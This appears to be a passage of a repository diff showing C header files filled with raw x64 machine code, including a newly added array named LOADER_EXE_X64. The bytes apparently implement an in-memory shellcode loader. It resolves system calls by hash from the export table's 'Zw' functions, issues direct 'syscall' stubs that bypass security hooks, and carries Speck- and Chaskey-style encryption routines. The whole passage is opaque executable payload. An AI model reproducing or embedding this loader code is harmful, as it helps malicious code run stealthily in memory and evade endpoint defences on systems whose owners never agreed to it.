2242 0x01, 0xd0, 0x48, 0x89, 0x45, 0x90, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x40,
2243 0x24, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x48, 0x89,
2244 0x45, 0x88, 0xc7, 0x45, 0xe0, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45,
2245 0x20, 0x48, 0x83, 0xc0, 0x04, 0x48, 0x89, 0x45, 0x80, 0x8b, 0x45, 0xe4,
2246 0x83, 0xe8, 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00,
2247 0x00, 0x48, 0x8b, 0x45, 0x90, 0x48, 0x01, 0xd0, 0x8b, 0x00, 0x89, 0xc2,
2248 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x78, 0xff,
2249 0xff, 0xff, 0x48, 0x8b, 0x85, 0x78, 0xff, 0xff, 0xff, 0x0f, 0xb7, 0x00,
2250 0x66, 0x3d, 0x5a, 0x77, 0x75, 0x70, 0x8b, 0x45, 0xe0, 0x48, 0x8d, 0x14,
2251 0xc5, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x80, 0x48, 0x8d, 0x1c,
2252 0x02, 0x48, 0x8b, 0x85, 0x78, 0xff, 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8,
2253 0xac, 0xfd, 0xff, 0xff, 0x89, 0x03, 0x8b, 0x45, 0xe4, 0x83, 0xe8, 0x01,
2254 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x45, 0x88, 0x48, 0x01,
2255 0xd0, 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0, 0x48, 0x8d, 0x14, 0x85, 0x00,
2256 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x98, 0x48, 0x01, 0xd0, 0x8b, 0x55,
2257 0xe0, 0x48, 0x8d, 0x0c, 0xd5, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55,
2258 0x80, 0x48, 0x01, 0xca, 0x8b, 0x00, 0x89, 0x42, 0x04, 0x83, 0x45, 0xe0,
2259 0x01, 0x81, 0x7d, 0xe0, 0xf4, 0x01, 0x00, 0x00, 0x74, 0x10, 0x83, 0x6d,
2260 0xe4, 0x01, 0x83, 0x7d, 0xe4, 0x00, 0x0f, 0x85, 0x49, 0xff, 0xff, 0xff,
2261 0xeb, 0x01, 0x90, 0x48, 0x8b, 0x45, 0x20, 0x8b, 0x55, 0xe0, 0x89, 0x10,
2262 0xc7, 0x45, 0xdc, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x30, 0x01, 0x00, 0x00,
2263 0xc7, 0x45, 0xd8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x0b, 0x01, 0x00, 0x00,
2264 0x8b, 0x45, 0xd8, 0x48, 0x8d, 0x14, 0xc5, 0x00, 0x00, 0x00, 0x00, 0x48,
2265 0x8b, 0x45, 0x80, 0x48, 0x01, 0xd0, 0x8b, 0x50, 0x04, 0x8b, 0x45, 0xd8,
2266 0x83, 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x0c, 0xc5, 0x00, 0x00, 0x00,
2267 0x00, 0x48, 0x8b, 0x45, 0x80, 0x48, 0x01, 0xc8, 0x8b, 0x40, 0x04, 0x39,
2268 0xc2, 0x0f, 0x86, 0xd0, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xd8, 0x48, 0x8d,
2269 0x14, 0xc5, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x80, 0x48, 0x01,
2270 0xd0, 0x8b, 0x00, 0x89, 0x85, 0x60, 0xff, 0xff, 0xff, 0x8b, 0x45, 0xd8,
2271 0x48, 0x8d, 0x14, 0xc5, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x80,
2272 0x48, 0x01, 0xd0, 0x8b, 0x40, 0x04, 0x89, 0x85, 0x64, 0xff, 0xff, 0xff,
2273 0x8b, 0x45, 0xd8, 0x83, 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0xc5,
2274 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x80, 0x48, 0x01, 0xd0, 0x8b,
2275 0x55, 0xd8, 0x48, 0x8d, 0x0c, 0xd5, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
2276 0x55, 0x80, 0x48, 0x01, 0xca, 0x8b, 0x00, 0x89, 0x02, 0x8b, 0x45, 0xd8,
2277 0x83, 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0xc5, 0x00, 0x00, 0x00,
2278 0x00, 0x48, 0x8b, 0x45, 0x80, 0x48, 0x01, 0xd0, 0x8b, 0x55, 0xd8, 0x48,
2279 0x8d, 0x0c, 0xd5, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x80, 0x48,
2280 0x01, 0xca, 0x8b, 0x40, 0x04, 0x89, 0x42, 0x04, 0x8b, 0x45, 0xd8, 0x83,
2281 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0xc5, 0x00, 0x00, 0x00, 0x00,
2282 0x48, 0x8b, 0x45, 0x80, 0x48, 0x01, 0xc2, 0x8b, 0x85, 0x60, 0xff, 0xff,
2283 0xff, 0x89, 0x02, 0x8b, 0x45, 0xd8, 0x83, 0xc0, 0x01, 0x89, 0xc0, 0x48,
2284 0x8d, 0x14, 0xc5, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x80, 0x48,
2285 0x01, 0xc2, 0x8b, 0x85, 0x64, 0xff, 0xff, 0xff, 0x89, 0x42, 0x04, 0x83,
2286 0x45, 0xd8, 0x01, 0x48, 0x8b, 0x45, 0x20, 0x8b, 0x00, 0x2b, 0x45, 0xdc,
2287 0x83, 0xe8, 0x01, 0x39, 0x45, 0xd8, 0x0f, 0x82, 0xe0, 0xfe, 0xff, 0xff,
2288 0x83, 0x45, 0xdc, 0x01, 0x48, 0x8b, 0x45, 0x20, 0x8b, 0x00, 0x83, 0xe8,
2289 0x01, 0x39, 0x45, 0xdc, 0x0f, 0x82, 0xbe, 0xfe, 0xff, 0xff, 0xb8, 0x01,
2290 0x00, 0x00, 0x00, 0x48, 0x81, 0xc4, 0xc8, 0x00, 0x00, 0x00, 0x5b, 0x5d,
2291 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30, 0x89, 0x4d, 0x10,
2292 0x48, 0x89, 0x55, 0x18, 0x48, 0x83, 0x7d, 0x18, 0x00, 0x75, 0x07, 0xb8,
2293 0xff, 0xff, 0xff, 0xff, 0xeb, 0x49, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89,
2294 0xc1, 0xe8, 0x1c, 0xfc, 0xff, 0xff, 0x85, 0xc0, 0x75, 0x07, 0xb8, 0xff,
2295 0xff, 0xff, 0xff, 0xeb, 0x32, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00,
2296 0xeb, 0x19, 0x48, 0x8b, 0x45, 0x18, 0x8b, 0x55, 0xfc, 0x8b, 0x44, 0xd0,
2297 0x04, 0x39, 0x45, 0x10, 0x75, 0x05, 0x8b, 0x45, 0xfc, 0xeb, 0x14, 0x83,
2298 0x45, 0xfc, 0x01, 0x48, 0x8b, 0x45, 0x18, 0x8b, 0x00, 0x39, 0x45, 0xfc,
2299 0x72, 0xdc, 0xb8, 0xff, 0xff, 0xff, 0xff, 0x48, 0x83, 0xc4, 0x30, 0x5d,
2300 0xc3, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9, 0x27, 0x6e, 0x95, 0x32,
2301 0x48, 0x8b, 0x54, 0x24, 0x60, 0x48, 0x83, 0xec, 0x28, 0xe8, 0x7b, 0xff,
2302 0xff, 0xff, 0x48, 0x83, 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58, 0x5a, 0x59,
2303 0x49, 0x89, 0xca, 0x0f, 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51, 0x52, 0x41,
2304 0x50, 0x41, 0x51, 0xb9, 0x0d, 0x22, 0x5e, 0x03, 0x48, 0x8b, 0x54, 0x24,
2305 0x78, 0x48, 0x83, 0xec, 0x28, 0xe8, 0x4f, 0xff, 0xff, 0xff, 0x48, 0x83,
2306 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58, 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f,
2307 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9,
2308 0x42, 0xb8, 0xce, 0x9a, 0x4c, 0x89, 0xc2, 0x48, 0x83, 0xec, 0x28, 0xe8,
2309 0x25, 0xff, 0xff, 0xff, 0x48, 0x83, 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58,
2310 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f, 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51,
2311 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9, 0x53, 0x91, 0x98, 0xf2, 0x4c, 0x89,
2312 0xc2, 0x48, 0x83, 0xec, 0x28, 0xe8, 0xfb, 0xfe, 0xff, 0xff, 0x48, 0x83,
2313 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58, 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f,
2314 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9,
2315 0xd1, 0xd6, 0x9d, 0x34, 0x48, 0x89, 0xd2, 0x48, 0x83, 0xec, 0x28, 0xe8,
2316 0xd1, 0xfe, 0xff, 0xff, 0x48, 0x83, 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58,
2317 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f, 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51,
2318 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9, 0x23, 0xe1, 0xbd, 0xe3, 0x4c, 0x89,
2319 0xca, 0x48, 0x83, 0xec, 0x28, 0xe8, 0xa7, 0xfe, 0xff, 0xff, 0x48, 0x83,
2320 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58, 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f,
2321 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9,
2322 0x17, 0x15, 0x91, 0x0b, 0x48, 0x8b, 0x54, 0x24, 0x50, 0x48, 0x83, 0xec,
2323 0x28, 0xe8, 0x7b, 0xfe, 0xff, 0xff, 0x48, 0x83, 0xc4, 0x28, 0x41, 0x59,
2324 0x41, 0x58, 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f, 0x05, 0xc3, 0x90, 0x0f,
2325 0x0b, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9, 0x15, 0x42, 0xb7, 0x1c,
2326 0x4c, 0x89, 0xc2, 0x48, 0x83, 0xec, 0x28, 0xe8, 0x51, 0xfe, 0xff, 0xff,
2327 0x48, 0x83, 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58, 0x5a, 0x59, 0x49, 0x89,
2328 0xca, 0x0f, 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51, 0x52, 0x41, 0x50, 0x41,
2329 0x51, 0xb9, 0x4b, 0x47, 0xa5, 0x31, 0x48, 0x8b, 0x54, 0x24, 0x58, 0x48,
2330 0x83, 0xec, 0x28, 0xe8, 0x25, 0xfe, 0xff, 0xff, 0x48, 0x83, 0xc4, 0x28,
2331 0x41, 0x59, 0x41, 0x58, 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f, 0x05, 0xc3,
2332 0x90, 0x0f, 0x0b, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9, 0xef, 0x7f,
2333 0x90, 0x87, 0x48, 0x8b, 0x54, 0x24, 0x48, 0x48, 0x83, 0xec, 0x28, 0xe8,
2334 0xf9, 0xfd, 0xff, 0xff, 0x48, 0x83, 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58,
2335 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f, 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51,
2336 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9, 0x2a, 0xfe, 0x9d, 0x24, 0x48, 0x8b,
2337 0x94, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x83, 0xec, 0x28, 0xe8, 0xca,
2338 0xfd, 0xff, 0xff, 0x48, 0x83, 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58, 0x5a,
2339 0x59, 0x49, 0x89, 0xca, 0x0f, 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51, 0x52,
2340 0x41, 0x50, 0x41, 0x51, 0xb9, 0x39, 0x2b, 0xcf, 0x55, 0x48, 0x8b, 0x54,
2341 0x24, 0x58, 0x48, 0x83, 0xec, 0x28, 0xe8, 0x9e, 0xfd, 0xff, 0xff, 0x48,
2342 0x83, 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58, 0x5a, 0x59, 0x49, 0x89, 0xca,
2343 0x0f, 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51,
2344 0xb9, 0x93, 0x76, 0x29, 0x34, 0x48, 0x8b, 0x94, 0x24, 0x80, 0x00, 0x00,
2345 0x00, 0x48, 0x83, 0xec, 0x28, 0xe8, 0x6f, 0xfd, 0xff, 0xff, 0x48, 0x83,
2346 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58, 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f,
2347 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9,
2348 0xf7, 0xc9, 0xac, 0xff, 0x4c, 0x89, 0xca, 0x48, 0x83, 0xec, 0x28, 0xe8,
2349 0x45, 0xfd, 0xff, 0xff, 0x48, 0x83, 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58,
2350 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f, 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x90,
2351 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5,
2352 0x48, 0x83, 0xec, 0x30, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
2353 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45, 0xd8, 0xc7, 0x45, 0xfc, 0x00,
2354 0x00, 0x00, 0x00, 0xeb, 0x1f, 0x8b, 0x45, 0xfc, 0x48, 0x8d, 0x14, 0x85,
2355 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x01, 0xd0, 0x8b,
2356 0x10, 0x8b, 0x45, 0xfc, 0x89, 0x54, 0x85, 0xe0, 0x83, 0x45, 0xfc, 0x01,
2357 0x83, 0x7d, 0xfc, 0x03, 0x76, 0xdb, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00,
2358 0x00, 0xeb, 0x5e, 0x8b, 0x45, 0xd8, 0xc1, 0xc8, 0x08, 0x89, 0xc2, 0x8b,
2359 0x45, 0xdc, 0x01, 0xc2, 0x8b, 0x45, 0xe0, 0x31, 0xd0, 0x89, 0x45, 0xd8,
2360 0x8b, 0x45, 0xdc, 0xc1, 0xc0, 0x03, 0x89, 0xc2, 0x8b, 0x45, 0xd8, 0x31,
2361 0xd0, 0x89, 0x45, 0xdc, 0x8b, 0x45, 0xec, 0x89, 0x45, 0xf8, 0x8b, 0x45,
2362 0xe4, 0xc1, 0xc8, 0x08, 0x89, 0xc2, 0x8b, 0x45, 0xe0, 0x01, 0xd0, 0x33,
2363 0x45, 0xfc, 0x89, 0x45, 0xec, 0x8b, 0x45, 0xe0, 0xc1, 0xc0, 0x03, 0x89,
2364 0xc2, 0x8b, 0x45, 0xec, 0x31, 0xd0, 0x89, 0x45, 0xe0, 0x8b, 0x45, 0xe8,
2365 0x89, 0x45, 0xe4, 0x8b, 0x45, 0xf8, 0x89, 0x45, 0xe8, 0x83, 0x45, 0xfc,
2366 0x01, 0x83, 0x7d, 0xfc, 0x1a, 0x76, 0x9c, 0x48, 0x8b, 0x45, 0xd8, 0x48,
2367 0x83, 0xc4, 0x30, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec,
2368 0x50, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45,
2369 0x10, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45,
2370 0xf8, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4, 0x00,
2371 0x00, 0x00, 0x00, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xc9,
2372 0x00, 0x00, 0x00, 0x8b, 0x55, 0xf4, 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x01,
2373 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x06, 0x83, 0x7d, 0xf4, 0x40,
2374 0x75, 0x73, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x2b, 0x45, 0xf0, 0x89, 0xc2,
2375 0x48, 0x8d, 0x4d, 0xd0, 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xc8, 0x41, 0x89,
2376 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x5e, 0xf5,
2377 0xff, 0xff, 0x8b, 0x45, 0xf0, 0xc6, 0x44, 0x05, 0xd0, 0x80, 0x83, 0x7d,
2378 0xf0, 0x0b, 0x76, 0x2b, 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x8d, 0x45, 0xd0,
2379 0x48, 0x89, 0xc1, 0xe8, 0xb0, 0xfe, 0xff, 0xff, 0x48, 0x31, 0x45, 0xf8,
2380 0x48, 0x8d, 0x45, 0xd0, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0xba, 0x00,
2381 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x25, 0xf5, 0xff, 0xff, 0x8b,
2382 0x45, 0xf4, 0xc1, 0xe0, 0x03, 0x89, 0x45, 0xdc, 0xc7, 0x45, 0xf0, 0x10,
2383 0x00, 0x00, 0x00, 0x83, 0x45, 0xec, 0x01, 0xeb, 0x1e, 0x8b, 0x55, 0xf4,
2384 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x89, 0xc2,
2385 0x8b, 0x45, 0xf0, 0x88, 0x54, 0x05, 0xd0, 0x83, 0x45, 0xf0, 0x01, 0x83,
2386 0x45, 0xf4, 0x01, 0x83, 0x7d, 0xf0, 0x10, 0x75, 0x1b, 0x48, 0x8b, 0x55,
2387 0xf8, 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc1, 0xe8, 0x4b, 0xfe, 0xff,
2388 0xff, 0x48, 0x31, 0x45, 0xf8, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00,
2389 0x83, 0x7d, 0xec, 0x00, 0x0f, 0x84, 0x2d, 0xff, 0xff, 0xff, 0x48, 0x8b,
2390 0x45, 0xf8, 0x48, 0x83, 0xc4, 0x50, 0x5d, 0xc3, 0x90, 0x90, 0x90, 0x90,
2391 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5,
2392 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
2393 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x45, 0x10,
2394 0x48, 0x89, 0x45, 0xe8, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb,
2395 0x42, 0x8b, 0x45, 0xfc, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00,
2396 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x8b, 0x08, 0x8b, 0x45, 0xfc,
2397 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe8,
2398 0x48, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45, 0xfc, 0x4c, 0x8d, 0x04, 0x85,
2399 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf0, 0x4c, 0x01, 0xc0, 0x31,
2400 0xca, 0x89, 0x10, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x03, 0x76,
2401 0xb8, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x1c, 0x01, 0x00,
2402 0x00, 0x48, 0x8b, 0x45, 0xf0, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48,
2403 0x83, 0xc0, 0x04, 0x8b, 0x00, 0x01, 0xc2, 0x48, 0x8b, 0x45, 0xf0, 0x89,
2404 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x04, 0x8b, 0x00, 0xc1,
2405 0xc0, 0x05, 0x89, 0xc1, 0x48, 0x8b, 0x45, 0xf0, 0x8b, 0x10, 0x48, 0x8b,
2406 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x04, 0x31, 0xca, 0x89, 0x10, 0x48, 0x8b,
2407 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x08, 0x8b, 0x08, 0x48, 0x8b, 0x45, 0xf0,
2408 0x48, 0x83, 0xc0, 0x0c, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83,
2409 0xc0, 0x08, 0x01, 0xca, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83,
2410 0xc0, 0x0c, 0x8b, 0x00, 0xc1, 0xc0, 0x08, 0x89, 0xc1, 0x48, 0x8b, 0x45,
2411 0xf0, 0x48, 0x83, 0xc0, 0x08, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48,
2412 0x83, 0xc0, 0x0c, 0x31, 0xca, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48,
2413 0x83, 0xc0, 0x08, 0x8b, 0x08, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0,
2414 0x04, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x08, 0x01,
2415 0xca, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0xc1, 0xc0, 0x10,
2416 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x0c, 0x8b, 0x00,
2417 0x01, 0xc2, 0x48, 0x8b, 0x45, 0xf0, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0,
2418 0x48, 0x83, 0xc0, 0x0c, 0x8b, 0x00, 0xc1, 0xc0, 0x0d, 0x89, 0xc1, 0x48,
2419 0x8b, 0x45, 0xf0, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0,
2420 0x0c, 0x31, 0xca, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0,
2421 0x04, 0x8b, 0x00, 0xc1, 0xc0, 0x07, 0x89, 0xc1, 0x48, 0x8b, 0x45, 0xf0,
2422 0x48, 0x83, 0xc0, 0x08, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83,
2423 0xc0, 0x04, 0x31, 0xca, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83,
2424 0xc0, 0x08, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x08,
2425 0xc1, 0xc2, 0x10, 0x89, 0x10, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc,
2426 0x0f, 0x0f, 0x86, 0xda, 0xfe, 0xff, 0xff, 0xc7, 0x45, 0xfc, 0x00, 0x00,
2427 0x00, 0x00, 0xeb, 0x42, 0x8b, 0x45, 0xfc, 0x48, 0x8d, 0x14, 0x85, 0x00,
2428 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x8b, 0x08,
2429 0x8b, 0x45, 0xfc, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48,
2430 0x8b, 0x45, 0xe8, 0x48, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45, 0xfc, 0x4c,
2431 0x8d, 0x04, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf0, 0x4c,
2432 0x01, 0xc0, 0x31, 0xca, 0x89, 0x10, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d,
2433 0xfc, 0x03, 0x76, 0xb8, 0x90, 0x90, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3,
2434 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x50, 0x48, 0x89, 0x4d, 0x10,
2435 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x44, 0x89, 0x4d, 0x28,
2436 0x48, 0x8b, 0x45, 0x20, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0x18,
2437 0x48, 0x89, 0x45, 0xe8, 0xe9, 0xc1, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4,
2438 0x00, 0x00, 0x00, 0x00, 0xeb, 0x18, 0x8b, 0x55, 0xf4, 0x48, 0x8b, 0x45,
2439 0xe8, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b, 0x45, 0xf4, 0x88, 0x54,
2440 0x05, 0xd0, 0x83, 0x45, 0xf4, 0x01, 0x83, 0x7d, 0xf4, 0x0f, 0x76, 0xe2,
2441 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x4d, 0x10, 0xe8,
2442 0xa0, 0xfd, 0xff, 0xff, 0x8b, 0x45, 0x28, 0xba, 0x10, 0x00, 0x00, 0x00,
2443 0x39, 0xd0, 0x0f, 0x47, 0xc2, 0x89, 0x45, 0xe4, 0xc7, 0x45, 0xf4, 0x00,
2444 0x00, 0x00, 0x00, 0xeb, 0x28, 0x8b, 0x55, 0xf4, 0x48, 0x8b, 0x45, 0xf8,
2445 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x08, 0x8b, 0x45, 0xf4, 0x0f, 0xb6, 0x54,
2446 0x05, 0xd0, 0x44, 0x8b, 0x45, 0xf4, 0x48, 0x8b, 0x45, 0xf8, 0x4c, 0x01,
2447 0xc0, 0x31, 0xca, 0x88, 0x10, 0x83, 0x45, 0xf4, 0x01, 0x8b, 0x45, 0xf4,
2448 0x3b, 0x45, 0xe4, 0x72, 0xd0, 0x8b, 0x45, 0xe4, 0x29, 0x45, 0x28, 0x8b,
2449 0x45, 0xe4, 0x48, 0x01, 0x45, 0xf8, 0xc7, 0x45, 0xf4, 0x10, 0x00, 0x00,
2450 0x00, 0xeb, 0x24, 0x8b, 0x45, 0xf4, 0x83, 0xe8, 0x01, 0x89, 0xc2, 0x48,
2451 0x8b, 0x45, 0xe8, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x83, 0xc2, 0x01,
2452 0x88, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x02, 0xeb, 0x0b, 0x83,
2453 0x6d, 0xf4, 0x01, 0x8b, 0x45, 0xf4, 0x85, 0xc0, 0x7f, 0xd5, 0x83, 0x7d,
2454 0x28, 0x00, 0x0f, 0x85, 0x35, 0xff, 0xff, 0xff, 0x90, 0x90, 0x48, 0x83,
2455 0xc4, 0x50, 0x5d, 0xc3, 0x90, 0x90, 0x90, 0x90, 0xff, 0xff, 0xff, 0xff,
2456 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
2457 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00,
2458 0x00, 0x00, 0x00, 0x00};
2459
+2457
-0
loader_exe_x64.h less more
0
1 unsigned char LOADER_EXE_X64[] = {
2 0x55, 0x48, 0x81, 0xec, 0x30, 0x05, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24,
3 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x8d, 0xc0, 0x04, 0x00, 0x00, 0x48,
4 0xc7, 0x85, 0xa8, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
5 0x85, 0xc0, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x08, 0x02, 0x00, 0x00,
6 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x51, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
7 0xc0, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x70, 0x48, 0x89, 0x85, 0xa0,
